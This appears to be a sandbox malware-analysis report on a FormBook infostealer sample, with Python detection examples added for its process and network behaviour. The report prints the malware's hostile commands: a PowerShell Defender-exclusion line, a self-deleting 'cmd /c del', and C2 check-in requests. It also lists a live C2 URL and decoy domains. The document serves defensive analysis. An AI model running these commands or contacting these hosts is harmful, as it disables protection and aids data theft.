
Windows Analysis Report
docs.exe

Overview

General Information

Sample name: docs.exe
Analysis ID: 1522819
MD5: 136dcc6497b13fe87bbad4aa5f859593
SHA1: 9da85420d2681d65df6757f44a0c8055ce6c1fba
SHA256: c89c37f0b5dc89251da6c37aa8e1071c43d52c80fd2326f1e6de8dcd5eaf0dfc
Tags: exe, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • docs.exe (PID: 2672 cmdline: "C:\Users\user\Desktop\docs.exe" MD5: 136DCC6497B13FE87BBAD4AA5F859593)
    • powershell.exe (PID: 5172 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3536 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • docs.exe (PID: 4620 cmdline: "C:\Users\user\Desktop\docs.exe" MD5: 136DCC6497B13FE87BBAD4AA5F859593)
      • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • wscript.exe (PID: 2224 cmdline: "C:\Windows\SysWOW64\wscript.exe" MD5: FF00E0480075B095948000BDC66E81F0)
          • cmd.exe (PID: 5876 cmdline: /c del "C:\Users\user\Desktop\docs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Extracted malware configuration (FormBook; the first entry is the live C2, the "decoy" entries are domains the bot also contacts):
{"C2 list": ["www.ridges-freezers-56090.bond/c24t/"], "decoy": ["ealthbridgeccs.online", "ngelicais.art", "uktuksu1.sbs", "fapoker.asia", "hecreature.tech", "orenzoplaybest14.xyz", "op-smartphones-deal.today", "delark.click", "7395.asia", "otnews.cfd", "j16e.xyz", "oko.events", "fscxb.top", "roudtxliberals.vote", "asas-br.bond", "ourhealthyourlife.shop", "fbpd.top", "j9u9.xyz", "uijiuw.top", "aming-chair-37588.bond", "uaweiharmony.top", "458881233.men", "ewancash.boats", "mss-rb2.net", "472.top", "yhomeshop.online", "j88.travel", "02s-pest-control-us-ze.fun", "oinl.club", "ouseware.today", "1385.net", "eviewmadu.top", "khizmetlergirisyapzzz2024.net", "dcnn.net", "aketrtpmvpslot88.info", "hoys.club", "ealerslot.net", "consuyt.xyz", "ilw.legal", "aithful.events", "est-life-insurance-2507.today", "rvinsadeli.dev", "sx9u.shop", "23fd595ig.autos", "yrhbt.shop", "commerce-74302.bond", "lc-driving-school.net", "7y1ps.shop", "earing-tests-69481.bond", "amilablackwell.online", "venir-bienne.info", "024tengxun396.buzz", "ocoani.shop", "arage-door-repair-1.today", "entista-esp.today", "vto.stream", "loud-computing-intl-3455364.fyi", "9790.club", "us-inbox-messages.online", "aser-hair-removal-90284.bond", "etangkhap99.lol", "leaningjobs-cz.today", "nline-courses-classes-lv-1.bond", "essislotgoal14.xyz"]}
Source | Rule | Description | Author | Strings
Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x18819:$sqlite3step: 68 34 1C 7B E1
    • 0x1892c:$sqlite3step: 68 34 1C 7B E1
    • 0x18848:$sqlite3text: 68 38 2A 90 C5
    • 0x1896d:$sqlite3text: 68 38 2A 90 C5
    • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
  (25 more entries not shown)
Source | Rule | Description | Author | Strings
Source: 5.2.docs.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x18819:$sqlite3step: 68 34 1C 7B E1
    • 0x1892c:$sqlite3step: 68 34 1C 7B E1
    • 0x18848:$sqlite3text: 68 38 2A 90 C5
    • 0x1896d:$sqlite3text: 68 38 2A 90 C5
    • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
  (5 more entries not shown)

          System Summary

          barindex
Three Sigma rules matched the same process-creation event (Source: Process started). Rule authors: Florian Roth (Nextron Systems) (two rules); Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements).
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe"
  CommandLine|base64offset|contains: ~2yzw
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ProcessId: 5172; ProcessName: powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\docs.exe"; ParentImage: C:\Users\user\Desktop\docs.exe; ParentProcessId: 2672; ParentProcessName: docs.exe
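The process tree and the Sigma matches above give three host-side tells: the 32-bit docs.exe (PID 2672) starts powershell.exe to add its own path to the Defender exclusion list (the System32 path in the command line is resolved to SysWOW64 by WOW64 file-system redirection, which is why Image and CommandLine disagree); the explorer.exe that the second docs.exe targets starts wscript.exe with no script argument (the FormBook configuration is later extracted from that wscript.exe's memory); and that wscript.exe runs cmd.exe /c del against the original sample path. The block below is an added example, not part of the Joe Sandbox report, showing those three checks run over process-creation records (Sysmon Event ID 1 or Windows 4688 carry these fields). The events are constructed from the tree above; the parent PID of the first docs.exe and the -EncodedCommand variant (PID 9001) are assumptions. Unlike the matched Sigma rule, which uses a base64offset modifier on the raw command line, it decodes -EncodedCommand explicitly before matching.

```python
"""Host-side detections for the behaviour in this report (added example, not Joe Sandbox code)."""
import base64
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


@dataclass
class Alert:
    pid: int
    rule: str
    detail: str


# Constructed process-creation events modelled on the process tree in the report.
# PIDs, images and command lines of 2672/5172/4620/4004/2224/5876 are taken from it;
# the parent PID of the first docs.exe (1000) and PID 9001 are assumptions.
ENCODED = base64.b64encode(
    'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'.encode("utf-16le")
).decode()
SAMPLE_EVENTS = [
    ProcEvent(2672, 1000, r"C:\Users\user\Desktop\docs.exe", r'"C:\Users\user\Desktop\docs.exe"'),
    ProcEvent(5172, 2672, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe"'),
    ProcEvent(4620, 2672, r"C:\Users\user\Desktop\docs.exe", r'"C:\Users\user\Desktop\docs.exe"'),
    ProcEvent(4004, 4620, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(2224, 4004, r"C:\Windows\SysWOW64\wscript.exe", r'"C:\Windows\SysWOW64\wscript.exe"'),
    ProcEvent(5876, 2224, r"C:\Windows\SysWOW64\cmd.exe", r'/c del "C:\Users\user\Desktop\docs.exe"'),
    ProcEvent(9001, 2672, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -EncodedCommand " + ENCODED),
]

MP_EXCLUSION = re.compile(r"\b(Add|Set)-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I | re.S)
ENC_CMD = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
SCRIPT_ARG = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh)\b", re.I)
DEL_TARGET = re.compile(r'\bdel\b\s+"?([^"]+?\.exe)"?', re.I)


def image_name(path: str) -> str:
    """File name of an image path, lower-cased, so SysWOW64 and System32 copies compare equal."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def effective_cmdline(cmd: str) -> str:
    """Append the decoded payload of a PowerShell -EncodedCommand (base64 of UTF-16LE), if any."""
    m = ENC_CMD.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16le")
    except ValueError:          # malformed base64 or UTF-16: match on the raw command line only
        return cmd


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> Iterator[ProcEvent]:
    """Walk up the parent chain (bounded so a corrupt PPID loop cannot spin forever)."""
    cur, depth = by_pid.get(ev.ppid), 0
    while cur is not None and depth < 32:
        yield cur
        cur, depth = by_pid.get(cur.ppid), depth + 1


def detect(events: List[ProcEvent]) -> List[Alert]:
    by_pid = {e.pid: e for e in events}
    alerts: List[Alert] = []
    for e in events:
        name = image_name(e.image)
        cmd = effective_cmdline(e.cmdline)
        # 1. Defender exclusion added from PowerShell (plain or hidden behind -EncodedCommand).
        if name in ("powershell.exe", "pwsh.exe") and MP_EXCLUSION.search(cmd):
            alerts.append(Alert(e.pid, "defender_exclusion_added", cmd))
        # 2. wscript.exe started by explorer.exe with no script to run: in this report it is
        #    only a host process for the final payload, not a script interpreter.
        if name == "wscript.exe" and not SCRIPT_ARG.search(e.cmdline):
            parent = by_pid.get(e.ppid)
            if parent and image_name(parent.image) == "explorer.exe":
                alerts.append(Alert(e.pid, "wscript_without_script_from_explorer", e.cmdline))
        # 3. cmd.exe deleting the image of a process further up its own ancestry (self-deletion).
        if name == "cmd.exe":
            m = DEL_TARGET.search(e.cmdline)
            if m and any(m.group(1).lower() == a.image.lower() for a in ancestors(e, by_pid)):
                alerts.append(Alert(e.pid, "ancestor_image_deleted", m.group(1)))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"PID {a.pid}: {a.rule}: {a.detail}")
```

Match on the image file name rather than the full path: the logged Image here is the SysWOW64 PowerShell while the command line names System32, and a path-anchored rule would miss one of them. The third check needs a complete parent chain, so it only works on a log that retains the earlier process-creation events, which is the case for Sysmon but not for an EDR feed that drops events for already-exited processes.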
Timestamp                        SID      Severity  Classtype                                      Source IP    Src Port  Destination IP  Dst Port  Protocol
2024-09-30T18:17:01.206547+0200  2031453  1         Malware Command and Control Activity Detected  192.168.2.6  49727     185.26.122.70   80        TCP
2024-09-30T18:20:05.308366+0200  2031453  1         Malware Command and Control Activity Detected  192.168.2.6  49733     188.114.96.3    80        TCP

          AV Detection

          barindex
Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp; Malware Configuration Extractor: FormBook (configuration as listed under Classification above)
Source: docs.exe; ReversingLabs: Detection: 44%
Source: Yara match; File source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: docs.exe; Joe Sandbox ML: detected
Source: docs.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: docs.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wscript.pdbGCTL; source: docs.exe, 00000005.00000002.2213093676.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, docs.exe, 00000005.00000002.2213646142.0000000000EC0000.00000040.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP; source: docs.exe, 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2212919973.000000000470C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2215494344.00000000048B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb; source: docs.exe, docs.exe, 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, wscript.exe, 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2212919973.000000000470C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2215494344.00000000048B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wscript.pdb; source: docs.exe, 00000005.00000002.2213093676.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, docs.exe, 00000005.00000002.2213646142.0000000000EC0000.00000040.10000000.00040000.00000000.sdmp, wscript.exe, wscript.exe, 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: fdGd.pdbSHA256; source: docs.exe
Source: Binary string: fdGd.pdb; source: docs.exe
Source: C:\Windows\SysWOW64\wscript.exe; Code function: 8_2_005923CE GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,__alloca_probe_16,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose

          Networking

          barindex
Source: Network traffic; Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49727 -> 185.26.122.70:80
Source: Network traffic; Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49727 -> 185.26.122.70:80
Source: Network traffic; Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49727 -> 185.26.122.70:80
Source: Network traffic; Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49733 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49733 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49733 -> 188.114.96.3:80
Source: C:\Windows\explorer.exe; Network Connect: 185.26.122.70:80
Source: C:\Windows\explorer.exe; Network Connect: 188.114.96.3:80
Source: Malware configuration extractor; URLs: www.ridges-freezers-56090.bond/c24t/
Source: global traffic; HTTP traffic detected: GET /c24t/?I6=z+nAhoA8drw9p0SUk4F23aiKXvdwmiYumykkUl5XSRWt3Wct2pK+VZvxUbC02dv5lpT+B1+jbQ==&AL0=9rN46F HTTP/1.1 | Host: www.oko.events | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F HTTP/1.1 | Host: www.j88.travel | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: Joe Sandbox View; IP Address: 188.114.96.3
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; ASN Name: HOSTLANDRU
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 11 times)
Source: C:\Windows\explorer.exe; Code function: 6_2_0FE94F82 getaddrinfo,setsockopt,recv
Source: global traffic; DNS traffic detected: DNS query: www.uijiuw.top
Source: global traffic; DNS traffic detected: DNS query: www.oko.events
Source: global traffic; DNS traffic detected: DNS query: www.hecreature.tech
Source: global traffic; DNS traffic detected: DNS query: www.ealerslot.net
Source: global traffic; DNS traffic detected: DNS query: www.aithful.events
Source: global traffic; DNS traffic detected: DNS query: www.amilablackwell.online
Source: global traffic; DNS traffic detected: DNS query: www.eviewmadu.top
Source: global traffic; DNS traffic detected: DNS query: www.khizmetlergirisyapzzz2024.net
Source: global traffic; DNS traffic detected: DNS query: www.23fd595ig.autos
Source: global traffic; DNS traffic detected: DNS query: www.j88.travel
Source: global traffic; DNS traffic detected: DNS query: www.venir-bienne.info
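Both captured requests, and the URLs recovered from explorer.exe memory further down, share the /c24t/ path from the extracted configuration while the Host header cycles through the decoy list (www.oko.events, www.j88.travel, and the further domains in the DNS queries above); each request has no User-Agent, uses Connection: close, and carries a query of the form <short key>=<base64 blob>&<short key>=<short token>. Only www.ridges-freezers-56090.bond is the live C2; the rest are decoys the bot contacts with the same request. The block below is an added example, not part of this report, that parses raw HTTP requests and flags that shape, and also reports any path that was sent to several different hosts, which is the rotation tell. The two captured requests are copied from the report; the request to the configured C2 host and the benign request are constructed, and CONFIG_HOSTS is a subset of the extracted configuration.

```python
"""Flagging FormBook check-in requests in HTTP request logs (added example, not Joe Sandbox code)."""
import re
from typing import Dict, List

# From the extracted configuration on this page: the C2 path and a subset of its hosts.
# Only ridges-freezers-56090.bond is the real C2; the others are decoys the bot also contacts.
CONFIG_PATH = "/c24t/"
CONFIG_HOSTS = {"ridges-freezers-56090.bond", "oko.events", "j88.travel", "23fd595ig.autos", "472.top"}
# Observed check-in query shape: <short key>=<base64 blob>&<short key>=<short token>
QUERY_SHAPE = re.compile(r"^\w{1,4}=[A-Za-z0-9+/%]+=*&\w{1,4}=[A-Za-z0-9]{4,8}$")

SAMPLE_REQUESTS = [
    # The two requests captured in this report, followed by the seven null bytes shown as Data Raw.
    "GET /c24t/?I6=z+nAhoA8drw9p0SUk4F23aiKXvdwmiYumykkUl5XSRWt3Wct2pK+VZvxUbC02dv5lpT+B1+jbQ==&AL0=9rN46F HTTP/1.1\r\n"
    "Host: www.oko.events\r\nConnection: close\r\n\r\n" + "\x00" * 7,
    "GET /c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F HTTP/1.1\r\n"
    "Host: www.j88.travel\r\nConnection: close\r\n\r\n" + "\x00" * 7,
    # Constructed: the same shape sent to the real C2 host from the configuration.
    "GET /c24t/?I6=QUJDREVGR0g=&AL0=9rN46F HTTP/1.1\r\nHost: www.ridges-freezers-56090.bond\r\nConnection: close\r\n\r\n",
    # Constructed benign request for contrast.
    "GET /index.html?id=1 HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n",
]


def parse_request(raw: str) -> Dict:
    """Split a raw HTTP/1.x request into method, path, query, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query, "headers": headers, "body": body}


def host_in_config(host: str) -> bool:
    """True if the Host header is a configured domain or a subdomain of one (the bot uses www.)."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in CONFIG_HOSTS)


def checkin_reasons(req: Dict) -> List[str]:
    """All indicators a request shows; the caller decides how many it needs."""
    h = req["headers"]
    reasons = []
    if req["path"] == CONFIG_PATH:
        reasons.append("config_path")
    if host_in_config(h.get("host", "")):
        reasons.append("config_host")
    if QUERY_SHAPE.match(req["query"]):
        reasons.append("query_shape")
    if "user-agent" not in h:
        reasons.append("no_user_agent")
    if h.get("connection", "").lower() == "close":
        reasons.append("connection_close")
    return reasons


def is_formbook_checkin(req: Dict) -> bool:
    """Configuration-derived indicators are decisive on their own; without them, require the
    generic query shape together with the missing User-Agent."""
    r = set(checkin_reasons(req))
    return bool(r & {"config_path", "config_host"}) or {"query_shape", "no_user_agent"} <= r


def path_rotation(reqs: List[Dict]) -> Dict[str, List[str]]:
    """Paths that were requested from more than one host: the same path across many hosts is
    how the bot walks its decoy list, and it survives a change of domains in the config."""
    seen: Dict[str, set] = {}
    for r in reqs:
        seen.setdefault(r["path"], set()).add(r["headers"].get("host", "").lower())
    return {p: sorted(h) for p, h in seen.items() if len(h) > 1}


if __name__ == "__main__":
    parsed = [parse_request(r) for r in SAMPLE_REQUESTS]
    for r in parsed:
        print(r["headers"].get("host"), is_formbook_checkin(r), checkin_reasons(r))
    print(path_rotation(parsed))
```

The generic fallback (query shape plus missing User-Agent) will also fire on other minimal HTTP clients, so treat config_host and config_path as the high-confidence signal and the shape as hunting material. Block by domain rather than by the two destination IPs: the report attributes them to CLOUDFLARENETUS and HOSTLANDRU, ranges shared with other tenants, while the domains come straight from the configuration.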
          Source: explorer.exe, 00000006.00000000.2157815827.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000006.00000002.4608809096.000000001079F000.00000004.80000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4586831233.000000000480C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590765350.0000000004FEF000.00000004.10000000.00040000.00000000.sdmp, docs.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
          Source: explorer.exe, 00000006.00000002.4608809096.000000001079F000.00000004.80000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4586831233.000000000480C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590765350.0000000004FEF000.00000004.10000000.00040000.00000000.sdmp, docs.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
          Source: explorer.exe, 00000006.00000000.2157815827.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000006.00000000.2157815827.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000006.00000002.4608809096.000000001079F000.00000004.80000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4586831233.000000000480C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590765350.0000000004FEF000.00000004.10000000.00040000.00000000.sdmp, docs.exeString found in binary or memory: http://ocsp.comodoca.com0
